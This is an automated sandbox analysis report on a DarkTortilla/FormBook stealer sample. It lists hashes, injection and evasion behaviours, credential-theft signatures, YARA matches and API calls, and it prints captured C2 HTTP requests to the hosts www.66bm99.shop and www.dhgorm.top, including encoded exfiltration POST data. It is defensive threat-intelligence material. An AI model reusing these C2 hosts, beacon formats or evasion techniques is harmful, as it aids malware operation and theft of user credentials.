Windows Analysis Report
rFV23+17555.exe

Overview

General Information

Sample name:	rFV23+17555.exe
Analysis ID:	1428881
MD5:	265a61c55a5139ac2ff0d9c53a64e1b1
SHA1:	edcc6a5534fbf0caa31a0e18d3c9f6b4e114465c
SHA256:	67611434a84b916587bc6a7f815cbe39f72c6403d304b1f1274d91e089e6527e
Tags:	exeMassLogger
Infos:

Detection

DarkTortilla, FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected FormBook

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: rFV23+17555.exe

ReversingLabs: Detection: 57%

Yara detected FormBook

Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: rFV23+17555.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: rFV23+17555.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: rFV23+17555.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: AddInProcess32.pdb source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3296262041.00000000031CC000.00000004.10000000.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018630470.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3236521411.00000000297FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: pathping.pdb source: AddInProcess32.exe, 00000004.00000002.2952201089.0000000001644000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2952201089.0000000001638000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000002.3294736772.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gxDswOWWlPEzerVr.exe, 00000006.00000000.2876704128.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018047319.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: pathping.pdbGCTL source: AddInProcess32.exe, 00000004.00000002.2952201089.0000000001644000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2952201089.0000000001638000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000002.3294736772.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2954385045.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2951842653.00000000027F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2954385045.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2951842653.00000000027F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3296262041.00000000031CC000.00000004.10000000.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018630470.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3236521411.00000000297FC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\PATHPING.EXE

Code function: 7_2_0041B790 FindFirstFileW,FindNextFileW,FindClose,

7_2_0041B790

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 4x nop then xor eax, eax		7_2_00409360
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 4x nop then pop edi		7_2_00411CE6

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /s8hu/?UPVdm=spiDyH1b3uFUsTZxkISg08MBQMtSMA3+DyfgsgsxVWVMb+cPydsAHF754/iEUPAVeA5OBQjW9+XTnykROPWO/pmJGuCBnJv2R6Kqa3nD4OdTG3fimHjEv0IbRXA2Kbqi0w==&4tDdP=cl18T6Ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.66bm99.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Source: unknown

DNS traffic detected: queries for: www.66bm99.shop

Source: unknown

HTTP traffic detected: POST /s8hu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enHost: www.dhgorm.topOrigin: http://www.dhgorm.topReferer: http://www.dhgorm.top/s8hu/Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 55 50 56 64 6d 3d 68 6c 4d 73 61 61 61 33 42 41 6b 50 55 4e 4f 41 34 30 6e 2b 38 6d 75 2f 63 65 52 65 36 6d 66 66 4f 76 73 4c 65 70 31 55 2f 6e 5a 72 56 4c 50 41 46 73 64 75 5a 54 74 6a 4c 35 5a 65 34 78 6d 63 4b 38 46 6c 41 71 51 53 45 5a 39 6c 56 52 63 4b 2b 77 34 77 46 46 42 70 47 70 6d 6f 75 55 7a 77 69 7a 45 65 43 72 32 79 61 53 2f 6b 4f 56 37 38 4c 75 46 49 49 76 75 6a 59 58 36 6c 58 77 41 6e 4d 54 39 64 61 61 55 72 59 47 58 54 4e 4f 66 39 55 69 62 46 4c 72 35 6b 48 73 4d 45 47 68 61 67 68 56 76 78 76 2b 35 52 50 70 36 61 6f 73 57 63 48 67 78 6b 4e 71 75 70 76 6b 62 73 78 46 75 61 63 6b 32 6b 4c 66 73 3d Data Ascii: UPVdm=hlMsaaa3BAkPUNOA40n+8mu/ceRe6mffOvsLep1U/nZrVLPAFsduZTtjL5Ze4xmcK8FlAqQSEZ9lVRcK+w4wFFBpGpmouUzwizEeCr2yaS/kOV78LuFIIvujYX6lXwAnMT9daaUrYGXTNOf9UibFLr5kHsMEGhaghVvxv+5RPp6aosWcHgxkNqupvkbsxFuack2kLfs=

Source: gxDswOWWlPEzerVr.exe, 00000008.00000002.3295074777.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dhgorm.top
Source: gxDswOWWlPEzerVr.exe, 00000008.00000002.3295074777.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dhgorm.top/s8hu/
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033$
Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: PATHPING.EXE, 00000007.00000002.3294360405.000000000274A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: PATHPING.EXE, 00000007.00000003.3129497006.000000000736C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0042AF73 NtClose,	4_2_0042AF73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02B60 NtClose,LdrInitializeThunk,	4_2_01B02B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01B02DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01B02C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B035C0 NtCreateMutant,LdrInitializeThunk,	4_2_01B035C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B04340 NtSetContextThread,	4_2_01B04340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B04650 NtSuspendThread,	4_2_01B04650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02BA0 NtEnumerateValueKey,	4_2_01B02BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02B80 NtQueryInformationFile,	4_2_01B02B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02BF0 NtAllocateVirtualMemory,	4_2_01B02BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02BE0 NtQueryValueKey,	4_2_01B02BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02AB0 NtWaitForSingleObject,	4_2_01B02AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02AF0 NtWriteFile,	4_2_01B02AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02AD0 NtReadFile,	4_2_01B02AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02DB0 NtEnumerateKey,	4_2_01B02DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02DD0 NtDelayExecution,	4_2_01B02DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02D30 NtUnmapViewOfSection,	4_2_01B02D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02D10 NtMapViewOfSection,	4_2_01B02D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02D00 NtSetInformationFile,	4_2_01B02D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02CA0 NtQueryInformationToken,	4_2_01B02CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02CF0 NtOpenProcess,	4_2_01B02CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02CC0 NtQueryVirtualMemory,	4_2_01B02CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02C00 NtQueryInformationProcess,	4_2_01B02C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02C60 NtCreateKey,	4_2_01B02C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02FB0 NtResumeThread,	4_2_01B02FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02FA0 NtQuerySection,	4_2_01B02FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02F90 NtProtectVirtualMemory,	4_2_01B02F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02FE0 NtCreateFile,	4_2_01B02FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02F30 NtCreateSection,	4_2_01B02F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02F60 NtCreateProcessEx,	4_2_01B02F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02EA0 NtAdjustPrivilegesToken,	4_2_01B02EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02E80 NtReadVirtualMemory,	4_2_01B02E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02EE0 NtQueueApcThread,	4_2_01B02EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B02E30 NtWriteVirtualMemory,	4_2_01B02E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B03090 NtSetValueKey,	4_2_01B03090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B03010 NtOpenDirectoryObject,	4_2_01B03010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B039B0 NtGetContextThread,	4_2_01B039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B03D10 NtOpenProcessToken,	4_2_01B03D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B03D70 NtOpenThread,	4_2_01B03D70
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C14340 NtSetContextThread,LdrInitializeThunk,	7_2_02C14340
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C14650 NtSuspendThread,LdrInitializeThunk,	7_2_02C14650
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12AD0 NtReadFile,LdrInitializeThunk,	7_2_02C12AD0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12AF0 NtWriteFile,LdrInitializeThunk,	7_2_02C12AF0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_02C12BE0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_02C12BF0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_02C12BA0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12B60 NtClose,LdrInitializeThunk,	7_2_02C12B60
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_02C12EE0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_02C12E80
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12FE0 NtCreateFile,LdrInitializeThunk,	7_2_02C12FE0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12FB0 NtResumeThread,LdrInitializeThunk,	7_2_02C12FB0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12F30 NtCreateSection,LdrInitializeThunk,	7_2_02C12F30
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_02C12CA0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12C60 NtCreateKey,LdrInitializeThunk,	7_2_02C12C60
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02C12C70
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12DD0 NtDelayExecution,LdrInitializeThunk,	7_2_02C12DD0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02C12DF0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_02C12D10
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_02C12D30
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C135C0 NtCreateMutant,LdrInitializeThunk,	7_2_02C135C0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C139B0 NtGetContextThread,LdrInitializeThunk,	7_2_02C139B0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12AB0 NtWaitForSingleObject,	7_2_02C12AB0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12B80 NtQueryInformationFile,	7_2_02C12B80
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12EA0 NtAdjustPrivilegesToken,	7_2_02C12EA0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12E30 NtWriteVirtualMemory,	7_2_02C12E30
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12F90 NtProtectVirtualMemory,	7_2_02C12F90
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12FA0 NtQuerySection,	7_2_02C12FA0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12F60 NtCreateProcessEx,	7_2_02C12F60
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12CC0 NtQueryVirtualMemory,	7_2_02C12CC0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12CF0 NtOpenProcess,	7_2_02C12CF0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12C00 NtQueryInformationProcess,	7_2_02C12C00
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12DB0 NtEnumerateKey,	7_2_02C12DB0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C12D00 NtSetInformationFile,	7_2_02C12D00
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C13090 NtSetValueKey,	7_2_02C13090
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C13010 NtOpenDirectoryObject,	7_2_02C13010
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C13D70 NtOpenThread,	7_2_02C13D70
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C13D10 NtOpenProcessToken,	7_2_02C13D10
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_004275F0 NtCreateFile,	7_2_004275F0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00427750 NtReadFile,	7_2_00427750
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00427840 NtDeleteFile,	7_2_00427840
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_004278D0 NtClose,	7_2_004278D0
